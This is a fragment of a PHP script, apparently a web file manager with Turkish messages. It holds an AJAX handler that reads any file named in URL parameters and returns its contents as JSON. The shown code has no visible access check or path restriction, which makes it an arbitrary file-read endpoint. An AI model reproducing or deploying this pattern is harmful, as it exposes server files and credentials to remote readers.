if (isset($_GET['ajax_get_content']) && isset($_GET['file']) && isset($_GET['p'])) { header('Content-Type: application/json'); $ajax_path = decodePath($_GET['p']); $ajax_file = urldecode($_GET['file']); $full_ajax_path = rtrim($ajax_path, '/') . '/' . $ajax_file; if (!file_exists($full_ajax_path) || !is_file($full_ajax_path)) { echo json_encode(['success' => false, 'error' => 'Dosya yok!']); } elseif (!is_readable($full_ajax_path)) { echo json_encode(['success' => false, 'error' => 'Okunamıyor!']); } else { $content = @file_get_contents($full_ajax_path); if ($content === false) { echo json_encode(['success' => false, 'error' => 'Okuma hatası!']); } else { $content_utf8 = mb_convert_encoding($content, 'UTF-8', mb_detect_encoding($content, 'UTF-8, ISO-8859-9, ISO-8859-1', true)); echo json_encode(['success' => true, 'filename' => htmlspecialchars($ajax_file), 'content' => $content_utf8]); } } exit; }
?>
</script>
</body>
</html>
<?php @ob_end_flush(); // Buffer'ı gönder ve kapat ?>